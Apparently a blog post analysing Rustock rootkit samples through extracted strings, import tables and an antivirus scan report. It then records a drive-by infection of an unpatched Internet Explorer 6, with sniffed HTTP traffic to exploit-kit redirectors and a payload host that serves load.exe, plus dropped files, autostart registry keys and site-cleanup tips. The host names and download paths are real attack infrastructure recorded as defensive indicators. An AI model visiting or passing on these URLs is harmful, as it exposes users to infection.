ZwCreateEvent
TransportAddress
ConnectionContext
C:\progz\NewWork\driver\objfre\i386\driver.pdb
LoadLibraryA
GetProcAddress
SetEvent
Init
CreateThread
SleepEx
FATAL_UNHANDLED_HARD_ERROR

wcschr
ZwClose
ZwSetValueKey
wcslen
ZwCreateKey
RtlInitUnicodeString
ZwUnmapViewOfSection
ExFreePoolWithTag
swprintf
ExAllocatePoolWithTag
ZwMapViewOfSection
ZwOpenSection
PsTerminateSystemThread
KeDelayExecutionThread
ZwCreateEvent
ZwOpenEvent
PsCreateSystemThread
PsGetCurrentProcessId
ZwQuerySystemInformation
IoGetCurrentProcess
ZwDeleteKey
ZwEnumerateKey
ZwOpenKey
IoGetRelatedDeviceObject
ZwCreateFile
ZwReadFile
ZwQueryInformationFile
KeReleaseMutex
KeWaitForSingleObject
KeInitializeEvent
KeInsertQueueApc
KeInitializeApc
KeClearEvent
ObfDereferenceObject
PsLookupThreadByThreadId
IoFreeMdl
KeDetachProcess
MmMapLockedPages
KeAttachProcess
MmBuildMdlForNonPagedPool
IoAllocateMdl
MmUnmapLockedPages
NtSetInformationProcess
ObReferenceObjectByHandle
PsLookupProcessByProcessId
PsSetCreateProcessNotifyRoutine
KeInitializeMutex
wcstombs
IofCompleteRequest
ProbeForRead
KeGetCurrentThread
KeSetEvent
KeServiceDescriptorTable
MmProbeAndLockPages
ObfReferenceObject
SeDeleteAccessState
RtlCopyUnicodeString
SeSetAccessStateGenericMapping
RtlMapGenericMask
SeCreateAccessState
ObCreateObject
IoFileObjectType
IoFreeIrp
IoAllocateIrp
ZwOpenFile
IoReuseIrp
IoGetDeviceObjectPointer
ProbeForWrite
MmUnlockPages
IoCancelIrp
IofCallDriver
_allmul
KeUnstackDetachProcess
KeStackAttachProcess
ntoskrnl.exe
_except_handler3
ExReleaseFastMutex
ExAcquireFastMutex
HAL.dll
NDIS.SYS

IoGetRelatedDeviceObject
KeInitializeEvent
DbgPrint
IoAllocateMdl
KeInitializeDpc
ntoskrnl.exe

ImagePath
Type
Start
ErrorControl
\BaseNamedObjects\5B37FB3B-984D-1E57-FF38-AA681BE5C8D8
\registry\machine\system\CurrentControlSet\Services\%x
\SystemRoot\System32\drivers\%x.sys
\BaseNamedObjects\{60F9FCD0-8DD4-6453-E394-771298D2A470}
services.exe
\registry\machine\system\CurrentControlSet\Enum\Root\LEGACY_%ws
\SystemRoot\System32\ntdll.dll
%ws%ws
\Device\Tcp
svchost.exe
\SystemRoot\Temp\%u.tmp
.log
\registry\machine\system
\Device\Tcp

These are interesting strings uh !?

So lets do a small analysis only based on strings we found:

%win can stand for Windows Directory (similar to the Environment variable – %WinDir%)

svchost.exe can be a process where the malware will inject code.

C:\progz\NewWork\driver\objfre\i386\driver.pdb ==> Very interesting string, is different from all the other variants of Rustock.Rootkit and should stand for a new version of the malware !!!

HAL.dll – Windows Hardware Abstraction Layer (HAL), is a file that hides hardware complexities from Win applications.

NDIS.sys – Network Driver Interface Specification (NDIS) is an application programming interface (API) for network interface cards (NICs).

\registry\machine\system\CurrentControlSet\Services\%x is the path of the Services and %x should be the variable that will be overwritten with the malware Service name.

\SystemRoot\System32\drivers\%x.sys is the path where are stored drivers and %x should be the variable that will be overwritten with the name of the malware driver.

services.exe can be used by malware to load and start services or the malware can inject code into it.

We can also see that into the file have embedded 2 PE, so, maybe, one is the kernel driver of the rootkit and the other one is the user-mode botnet.

Unfortunately I can not test/run this sample so I can only show this small analysis, anyway very interesting code!

Another file that was present with this rootkit was named sxmg4.dll and below there is the report of the scan:

Report Generated 18.11.2008 at 0.13.08 (GMT 1)
Time for scan: 33 seconds
Filename: sxmg4.dll
File size: 68 KB
MD5 Hash: 15EB3167B2B87F168B1D997530D41003
SHA1 Hash: 206C3E2D26F051C988D38F3B22215F81AE68C54A
CRC32: 542643393
Application Type: Dinamyc Link Library (DLL) 32bit
Packer detected: Microsoft Visual C++ 6.0 DLL
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 5 on 23

Antivirus Result
a-squared Trojan.Win32.BHO.d!IK
Avira AntiVir Nothing found!
Avast Nothing found!
AVG Trojan horse BackDoor.Ircbot.GEV
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Trojan.Win32.BHO.d
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Win32/Adware.AntiSpyKing application
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Trojan-Downloader.Win32.FraudLoad.vdjm
VirusBuster Nothing found!

Import Tables:

KERNEL32.DLL
+GetTempPathA
+WaitForSingleObject
+GetLocalTime
+DisableThreadLibraryCalls
+InterlockedDecrement
+MoveFileExA
+LeaveCriticalSection
+EnterCriticalSection
+lstrlenW
+GetSystemDirectoryA
+GetWindowsDirectoryA
+GetModuleFileNameA
+GetTickCount
+DeleteCriticalSection
+InitializeCriticalSection
+SystemTimeToFileTime
+GetFileAttributesA
+GetModuleHandleA
+FindResourceA
+SizeofResource
+GetLastError
+WideCharToMultiByte
+Sleep
+lstrlenA
+MultiByteToWideChar
+CloseHandle
+InterlockedIncrement
ADVAPI32.dll
+RegNotifyChangeKeyValue
ATL.DLL
GDI32.dll
+GetDeviceCaps
MSVCP60.dll
+?_Xran@std@@YAXXZ
+??1_Winit@std@@QAE@XZ
+??0_Winit@std@@QAE@XZ
+??1Init@ios_base@std@@QAE@XZ
+??0Init@ios_base@std@@QAE@XZ
+?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z
+?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
+?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
+?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PAD0PBD@Z
+?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
+?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
+?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z
+??0_Lockit@std@@QAE@XZ
+??1_Lockit@std@@QAE@XZ
+??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z
+?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z
+??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
+??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
+?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
+?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
+?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
+?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
+?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
+??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
+??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
+?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
MSVCRT.dll
+_mbslwr
+wcslen
+_vsnprintf
+strcat
+memcmp
+memmove
+isspace
+rand
+memcpy
+strtok
+fclose
+fread
+fopen
+fwrite
+strrchr
+strcmp
+ftell
+fseek
+_beginthreadex
+_purecall
+_ftol
+pow
+strtol
+__dllonexit
+_strlwr
+_onexit
+_except_handler3
+?terminate@@YAXXZ
+_initterm
+_adjust_fdiv
+??2@YAPAXI@Z
+__CxxFrameHandler
+srand
+free
+strlen
+strncpy
+calloc
ole32.dll
+CoCreateInstance
OLEAUT32.dll
SHELL32.dll
+ShellExecuteA
USER32.dll
+KillTimer

And below there are some extracted strings:

http://
class=”title”
text=
gping=
class=yschttl
class=l
n[keyword]
c.php?id=
http
\TSoft
Software
\lt.res
\sft.res
open
rundll32.exe
%s,RunMain
\sn.txt
popurl
DOWNLOAD
clickreferer
referer
$number
feed
KEYS
SECT
%d.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{32C620D6-CC10-4e6a-9715-BACACD5B0E61} ====> here we can see that will install BHO
Systray component
SOFTWARE\Microsoft\Active Setup\Installed Components\{A744F16C-B2D5-4138-81A2-085CDFCDE83A}
WebProxy
{A744F16C-B2D5-4138-81A2-085CDFCDE83A}
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
EulaAccepted
Software\Sysinternals\Bluescreen Screen Saver
iexplore.exe
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
explorer.exe
F\bulksoft.ini
btimeout
mbinterval
binterval
mbcaption
bcaption
mburl
burl
mbtext
btext
PROM
lang
PSECT
Software\AntispyKnight
\sysin.scr
_WSCLAS_
InstallLanguage
SYSTEM\CurrentControlSet\Control\Nls\Language
Software\Microsoft\Active Setup\Installed Components\{A744F16C-B2D5-4138-81A2-085CDFCDE83A}
Systray
Software\Microsoft\Windows\CurrentVersion\Run
rundll32.exe %s,RunMain
Hookd
YIHookWWW

We can see 2 .EXE:

iexplore.exe
explorer.exe

that probably are the .EXEs where the malware will inject the dll or other code.

We can see a reference to a registry key used to add keys to autostart a program:

Software\Microsoft\Windows\CurrentVersion\Run

We can see also a reference to a possible software that will be installed:

Software\AntispyKnight

and if we check also the detection name of:

NOD32 v3 Win32/Adware.AntiSpyKing application
VBA32 Trojan-Downloader.Win32.FraudLoad.vdjm

We can maybe imagine that will be installed a rogue software in our computer that is possibly named as AntispyKnight.

Ok, this analysis end here : )

I decided to analyze the iframe code and used an old version of Internet Explorer 6.0, unpatched to make sure I got infected. I visited that iframe and after a few seconds a massive malware infection started, and my computer started connecting to a lot of different IPs.

Here is result of the network traffic sniffed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default
 
GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php
 
GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com
 
HTTP/1.1 200 OK
Content-Length: 7880
 
GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
 
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
 
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close

While internet traffic sniffer was active, the computer was infected with malware that was downloaded in Temp folder with the name winMN448Eewaoz.exe and after this file was executed, it dropped a file in C:\WINDOWS\system32\ with the name ~.exe, that was downloaded via this GET query:

1

GET /all/load.php?id=45751&spl=5 HTTP/1.1

We can see the file load.php has a variable named spl with assigned the number 5 and we can assume it has loaded the payload for the exploit (aka sploit) number 5. Again we can assume this is an exploit kit that is serving more than 5 different exploits to infect an user.

Here is a small analysis of that malware activity:

• Downloaded in Temp Folder as winMN448Eewaoz.exe
• Copyed in C:\WINDOWS\system32\~.exe
• Injected code into svchost.exe
• Opened remote connections with IP 66.232.116.2 on port 80

After some time others files were downloaded in my system. I started Rootkit Unhooker and I noticed some suspicious drivers in the Driver List that made me think of a possible stealth malware or rootkit activity.

If you click properties on driver column of rnvrnrrv.sys you get the file is of 0 bytes… Why 0 bytes and no info on creation/modification etc. ?
The kernel driver rnvrnrrv.sys is loaded and hidden from explorer search (seems that the driver hides every file with name *rnvrnrrv*).

Below there are PE Import Table of rnvrnrrv.sys:

+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3

Here is a list of all created files by the malware (there is no order):

1
2
3
4
5
6
7
8
9
10
11
12
13

C:\WINDOWS\msauc.exe
C:\WINDOWS\system32\*randomnumber*.cpx
C:\WINDOWS\system32\*randomnumber*.dat
C:\WINDOWS\system32\wpv*randomnumber*.cpx
C:\WINDOWS\system32\msansspc.dll
%TempFolder%\winMN448Eewaoz.exe
%ProgramFiles%\xeifh\SetActAdm.dll
%ProgramFiles%\Internet Explorer\msansspc.dll
C:\WINDOWS\system32\drivers\rnvrnrrv.sys
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\system32\fqqtiaag.tmp
C:\WINDOWS\TDEZAALK.exe
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe

The malware created following registry keys:

1
2
3

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]

This is a log file of HijackThis with the malware traces:

1
2
3
4
5
6
7
8
9
10

Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
 
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)

What can we do if our website is infected ?

• Clean the infected HTML/PHP pages
• Change username and password to the FTP Account
• Change username and password to the Email Account
• Change username and password to the SSH
• Contact the server admin and explain your situation
• Check your PHP files for possible vulnerabilities
• Update all the installed software (blog, forum, etc)
• Remember to never make backups from the website to your PC
• Use always local backups for the website files